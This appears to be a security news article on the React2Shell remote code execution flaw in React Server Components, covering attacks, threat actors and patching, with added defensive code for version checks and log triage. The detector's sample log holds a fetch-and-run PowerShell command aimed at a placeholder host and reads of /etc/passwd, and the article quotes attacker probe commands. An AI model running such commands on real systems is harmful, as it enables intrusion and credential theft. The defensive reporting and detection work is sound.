React2Shell (CVE-2025-55182): Critical React Server Components RCE Under Active Exploitation

CyberSecureFox 🦊

The critical React2Shell vulnerability (CVE-2025-55182) in the React ecosystem has moved from a theoretical risk to large‑scale, real‑world exploitation. Within hours of public disclosure, active attacks were observed against production systems, with researchers estimating that more than 30 organizations have already been compromised and over 77,000 servers worldwide remain potentially exposed.

What Is React2Shell (CVE-2025-55182) and Why It Is So Dangerous

React2Shell is a remote code execution (RCE) vulnerability in React Server Components (RSC). It has been assigned a CVSS score of 10.0, the maximum possible rating, indicating a critical impact on confidentiality, integrity, and availability of affected servers.

The root cause is unsafe deserialization of untrusted data on the server side. By sending a specially crafted HTTP request, an attacker can trigger deserialization logic that allows execution of arbitrary code on the server. The attack does not require authentication, elevated privileges, or user interaction, which significantly lowers the bar for exploitation and enables mass scanning and automated attacks.

The vulnerability affects default configurations of React 19.0, 19.1.0, 19.1.1, and 19.2.0, as well as applications built on Next.js that rely on React Server Components. Security fixes are available in React 19.0.1, 19.1.2, 19.2.1 and in updated Next.js releases, which eliminate the unsafe deserialization path.

Researchers warn that similar design flaws may exist in other server‑side React implementations and related tooling, including the Vite RSC plugin, the Parcel RSC plugin, the React Router RSC preview, RedwoodSDK, and Waku. This broadens the potential blast radius of React2Shell across the wider JavaScript and Node.js ecosystem, especially in cloud‑native and microservices‑based architectures.

Scope of Exposure and Early Attack Activity

According to data from the Shadowserver Foundation, scans have identified 76,664 unique IP addresses on the public internet that appear vulnerable to React2Shell, including approximately 3,000 exposed hosts in Russia. Detection relied on techniques described by researchers from Searchlight Cyber and Assetnote, where servers are probed with crafted HTTP requests and the structure of the response is used to infer the presence of the vulnerable React Server Components behavior.

In parallel, security teams at Rapid7 and Elastic Security have confirmed the availability of working proof‑of‑concept (PoC) exploits in public repositories. Threat intelligence provider GreyNoise has already observed attempts to exploit React2Shell from 181 unique IP addresses. Most of this traffic is automated and originates from infrastructure in the Netherlands, China, the United States, Hong Kong, and several other regions, consistent with large‑scale opportunistic scanning campaigns.

Attacker Tactics: From Reconnaissance to Persistent Access

Incident reports show a repeatable pattern in how adversaries are weaponizing CVE-2025-55182. In the initial phase, attackers typically execute simple PowerShell commands to verify whether remote code execution is possible. A common example is a command such as powershell -c "40138*41979", which computes a predictable numeric result while leaving only minimal and often overlooked traces in logs.

Once execution is confirmed, attackers escalate to more sophisticated payloads, often using base64‑encoded PowerShell commands to evade naive detection signatures. Additional scripts are downloaded directly into memory, avoiding writes to disk and thereby bypassing many traditional antivirus and endpoint detection controls. In one documented case, payloads were retrieved from the IP address 23[.]235[.]188[.]3, with the scripts loaded and executed entirely in RAM.

These scripts commonly attempt to disable the Antimalware Scan Interface (AMSI), a Windows security feature that inspects scripts before execution. By turning off or tampering with AMSI, attackers can run obfuscated PowerShell code and post‑exploitation tooling with reduced likelihood of detection, then proceed to deploy subsequent stages of the intrusion.

Samples analyzed via VirusTotal indicate that some of these payloads install a Cobalt Strike beacon on compromised hosts. Although Cobalt Strike is a legitimate penetration testing platform, it is widely abused by threat actors to maintain long‑term persistence, issue remote commands, move laterally across networks, and coordinate follow‑on actions such as data theft or ransomware deployment.

APT Involvement and Focus on Cloud Infrastructure

The security team at Amazon Web Services (AWS) reports that attempts to exploit React2Shell began within hours of the initial disclosure. Part of this activity has been traced back to infrastructure previously associated with China‑linked advanced persistent threat (APT) groups, including Earth Lamia and Jackpot Panda, suggesting that both state‑aligned and criminal actors are racing to weaponize the vulnerability.

Researchers at Palo Alto Networks estimate that more than 30 organizations have already been affected. On compromised servers, attackers are observed running commands such as whoami and id, reading /etc/passwd, attempting to write files, and aggressively searching for AWS configuration files and credentials. This behavior is consistent with efforts to expand access into cloud control planes and associated services.

Some attack clusters have been linked to the government‑associated group UNC5174 (also tracked as CL‑STA‑1015). In victim environments, analysts have identified the presence of tools such as Snowlight, a dropper used to deliver additional malicious payloads, and Vshell, a backdoor that provides remote access, post‑exploitation capabilities, and lateral movement. These tools and techniques align with previously documented UNC5174 tradecraft.

Regulatory Response and Impact on Global Service Providers

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-55182 to its Known Exploited Vulnerabilities (KEV) catalog. Inclusion in KEV means the vulnerability is confirmed as being actively exploited in the wild and is considered a priority for remediation. U.S. federal agencies have been mandated to apply relevant patches no later than 26 December 2025, underscoring the urgency and seriousness of the issue.

React2Shell has also had indirect effects on major internet infrastructure. During the rapid rollout of new web application firewall (WAF) rules to mitigate this vulnerability, Cloudflare encountered an internal error that temporarily affected around 28% of all HTTP traffic traversing its network. While this incident was not the result of a cyberattack, it highlights how a single critical software flaw can trigger far‑reaching operational responses and cascading impacts across global platforms.

How Organizations Should Respond to the React2Shell Threat

Organizations running React Server Components, Next.js, or related RSC tooling should treat React2Shell as an immediate incident‑level risk. The first priority is to apply all available security updates for React and Next.js, and to verify that build pipelines, containers, and server images are using the patched versions (React 19.0.1, 19.1.2, 19.2.1 and corresponding fixed Next.js releases). An accurate inventory of internet‑exposed services, ideally supported by asset discovery tools and software bills of materials (SBOMs), is critical to ensure no vulnerable endpoints are overlooked.
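An added example, not code from the article or from the React or Next.js projects: a small Node.js check that walks a package-lock "packages" map (lock-file v2/v3 shape assumed) and reports every installed copy of React that is still below the fixed release for its 19.x line, using the affected and fixed versions the article names. The lock file below is a constructed sample.

```javascript
// Fixed release per 19.x line, as given in the article. Anything on these lines
// below the fixed version is treated as affected; other lines are reported as unknown.
const FIXED_BY_LINE = { '19.0': '19.0.1', '19.1': '19.1.2', '19.2': '19.2.1' };

function parseSemver(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(v);
  return m ? m.slice(1, 4).map(Number) : null;
}

function compareSemver(a, b) {
  const pa = parseSemver(a), pb = parseSemver(b);
  for (let i = 0; i < 3; i++) if (pa[i] !== pb[i]) return pa[i] - pb[i];
  return 0;
}

// Returns 'patched' | 'affected' | 'unknown' for one installed react version string.
function classifyReactVersion(version) {
  const parts = parseSemver(version);
  if (!parts) return 'unknown';
  const fixed = FIXED_BY_LINE[`${parts[0]}.${parts[1]}`];
  if (!fixed) return 'unknown'; // not a 19.0 / 19.1 / 19.2 release line
  return compareSemver(version, fixed) >= 0 ? 'patched' : 'affected';
}

// Walks every "node_modules/.../react" entry, so nested duplicate installs are not missed.
function findAffectedReact(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (!path.endsWith('node_modules/react') || !meta.version) continue;
    if (classifyReactVersion(meta.version) === 'affected') {
      findings.push({ path, version: meta.version, fixIn: FIXED_BY_LINE[meta.version.slice(0, 4)] });
    }
  }
  return findings;
}

// Constructed sample shaped like a package-lock.json "packages" map (not a real lock file).
const SAMPLE_LOCK = {
  packages: {
    'node_modules/react': { version: '19.2.0' },
    'node_modules/next': { version: '15.0.0' },
    'node_modules/some-lib/node_modules/react': { version: '19.1.2' },
  },
};

for (const f of findAffectedReact(SAMPLE_LOCK)) {
  console.log(`${f.path}: react ${f.version} is affected, upgrade to ${f.fixIn}`);
}
```

The same walk can be pointed at the lock file inside a container image or build artifact to confirm the patched version actually shipped.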

Security monitoring should be hardened around PowerShell activity, script execution, and outbound network connections. Recommended measures include enabling advanced PowerShell logging (module, script block, and transcription), alerting on base64‑encoded commands, detecting AMSI tampering, and inspecting suspicious connections to previously unseen IP addresses or domains. Environments should be proactively scanned for signs of Cobalt Strike beacons, Vshell, and Snowlight, as well as anomalous usage of system utilities and cloud management tools.

Given the confirmed exploitation by advanced threat actors, organizations are advised to conduct retrospective log reviews from the date of public disclosure of React2Shell, looking for telltale command patterns (whoami, id, cat /etc/passwd, unexpected PowerShell execution), unusual process trees, and configuration file access. Where compromise is suspected, incident response actions should include account and credential rotation, particularly for AWS IAM users, roles, and access keys, and a review of cloud audit logs (such as AWS CloudTrail) for unauthorized administrative operations.
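An added example, not tooling from the article or any vendor, illustrating the monitoring and retrospective log review recommended above: a Node.js triage pass over process command-line records that flags the arithmetic RCE probe, base64-encoded PowerShell (decoded before matching), in-memory download idioms, AMSI tampering strings, and the recon commands the article lists. The log shape (one command line per string) and the 203.0.113.10 address are assumptions; the records are constructed, not real telemetry.

```javascript
const RULES = [
  // "powershell -c <n>*<n>" arithmetic probe used to confirm code execution
  { id: 'rce-probe', re: /powershell(?:\.exe)?\s+-c(?:ommand)?\s+"?\d+\s*\*\s*\d+"?/i },
  // fetch-and-evaluate idioms that keep the script in memory rather than on disk
  { id: 'in-memory-download', re: /\b(?:IEX|Invoke-Expression)\b.*DownloadString/i },
  // identifiers that commonly appear in AMSI tampering attempts
  { id: 'amsi-tamper', re: /amsi(?:utils|initfailed|scanbuffer)/i },
  // recon commands named in the article
  { id: 'recon', re: /(?:^|[\s;&|"'])(?:whoami|id|cat\s+\/etc\/passwd)(?=[\s;&|"']|$)/i },
];

// -EncodedCommand / -enc / -e carries base64 of UTF-16LE text; decode it so the rules
// are applied to the real command instead of an opaque blob.
function decodeEncodedCommand(cmdline) {
  const m = /-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})/i.exec(cmdline);
  if (!m) return null;
  const text = Buffer.from(m[1], 'base64').toString('utf16le');
  return text.length > 0 ? text : null;
}

function triageCommandLine(cmdline) {
  const hits = new Set();
  const decoded = decodeEncodedCommand(cmdline);
  if (decoded !== null) hits.add('encoded-powershell');
  for (const text of [cmdline, decoded ?? '']) {
    for (const rule of RULES) if (rule.re.test(text)) hits.add(rule.id);
  }
  return { cmdline, decoded, hits: [...hits].sort() };
}

// Returns only the records that tripped at least one rule.
function triageLog(lines) {
  return lines.map(triageCommandLine).filter(r => r.hits.length > 0);
}

// Constructed sample records (not real telemetry).
const ENCODED = Buffer.from("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')", 'utf16le').toString('base64');
const SAMPLE_LOG = [
  'powershell -c "40138*41979"',
  `powershell -nop -w hidden -enc ${ENCODED}`,
  'sh -c "whoami; id; cat /etc/passwd"',
  'node server.js --port 3000',
];

for (const r of triageLog(SAMPLE_LOG)) {
  console.log(r.hits.join(','), '<-', r.cmdline.slice(0, 60));
}
```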

React2Shell illustrates how a single flaw in a widely used web framework can rapidly translate into a broad attack surface for both opportunistic and targeted adversaries. Organizations that depend on React, Next.js, and modern JavaScript tooling should not only patch aggressively, but also invest in secure coding practices that avoid unsafe deserialization patterns, perform regular code reviews and threat modeling, and maintain a mature vulnerability management process. The speed and scale of exploitation around CVE-2025-55182 make clear that early patching, continuous monitoring, and disciplined cloud security hygiene are now essential prerequisites for operating modern web applications safely.
